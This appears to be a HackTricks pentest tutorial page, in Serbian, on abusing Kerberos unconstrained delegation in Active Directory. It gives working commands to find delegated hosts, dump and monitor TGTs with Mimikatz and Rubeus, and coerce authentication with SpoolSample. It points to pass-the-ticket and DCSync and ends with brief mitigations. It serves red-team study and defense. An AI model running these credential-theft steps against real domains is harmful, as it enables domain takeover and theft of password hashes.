Unconstrained Delegation

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Da li radite u cybersecurity kompaniji? Želite li da vidite vašu kompaniju reklamiranu na HackTricks-u? Ili želite da imate pristup najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF formatu? Proverite SUBSCRIPTION PLANS!
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Nabavite zvanični PEASS & HackTricks swag
Pridružite se 💬 Discord grupi ili telegram grupi ili me pratite na Twitter-u 🐦@carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na hacktricks repo i hacktricks-cloud repo.

Neograničeno preusmeravanje

Ovo je funkcija koju Administrator domena može postaviti na bilo koji računar unutar domena. Zatim, svaki put kada se korisnik prijavi na računar, kopija TGT-a tog korisnika će biti poslata unutar TGS-a koji pruža DC i sačuvana u memoriji u LSASS-u. Dakle, ako imate administratorske privilegije na mašini, moći ćete izvući tikete i preuzeti identitet korisnika na bilo kojoj mašini.

Dakle, ako se administrator domena prijavi na računar sa aktiviranom funkcijom "Neograničeno preusmeravanje", i vi imate lokalne administratorske privilegije na toj mašini, moći ćete izvući tiket i preuzeti identitet Administratora domena bilo gde (privilegije domene).

Možete pronaći objekte računara sa ovim atributom proveravajući da li atribut userAccountControl sadrži ADS_UF_TRUSTED_FOR_DELEGATION. To možete uraditi sa LDAP filterom ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, što je ono što powerview radi:

# Lista računara sa neograničenim preusmeravanjem
## Powerview
Get-NetComputer -Unconstrained #DC-ovi uvek se pojavljuju ali nisu korisni za privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Izvoz tiketa sa Mimikatz-om
privilege::debug
sekurlsa::tickets /export #Preporučeni način
kerberos::list /export #Još jedan način

# Prati prijave i izvozi nove tikete
.\Rubeus.exe monitor /targetuser:<korisničko_ime> /interval:10 #Proveri svakih 10s za nove TGT-ove

Učitajte tiket Administratora (ili žrtvenog korisnika) u memoriju sa Mimikatz-om ili Rubeus-om za Pass the Ticket. Više informacija: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ Više informacija o neograničenom preusmeravanju na ired.team.

Prisilna autentifikacija

Ako napadač uspe da kompromituje računar koji je dozvoljen za "Neograničeno preusmeravanje", on može prevariti server za štampu da se automatski prijavi na njega čime se čuva TGT u memoriji servera. Zatim, napadač može izvršiti napad Pass the Ticket da bi preuzeo identitet korisnika naloga računara za štampu.

Da biste naterali server za štampu da se prijavi na bilo koju mašinu, možete koristiti SpoolSample:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Ako je TGT sa kontrolera domena, možete izvesti napad DCSync i dobiti sve hešove sa kontrolera domena. Više informacija o ovom napadu na ired.team.

Evo drugih načina da pokušate izazvati autentifikaciju:

pageForce NTLM Privileged Authentication

Mitigacija

Ograničite DA/Admin prijave na određene servise
Postavite "Account is sensitive and cannot be delegated" za privilegovane naloge.

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Radite li u cybersecurity kompaniji? Želite li videti vašu kompaniju reklamiranu na HackTricks-u? Ili želite pristupiti najnovijoj verziji PEASS-a ili preuzeti HackTricks u PDF formatu? Proverite SUBSCRIPTION PLANS!
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Nabavite zvanični PEASS & HackTricks swag
Pridružite se 💬 Discord grupi ili telegram grupi ili me pratite na Twitter-u 🐦@carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na hacktricks repo i hacktricks-cloud repo.

PreviousSkeleton Key NextWindows Security Controls

Last updated 2 months ago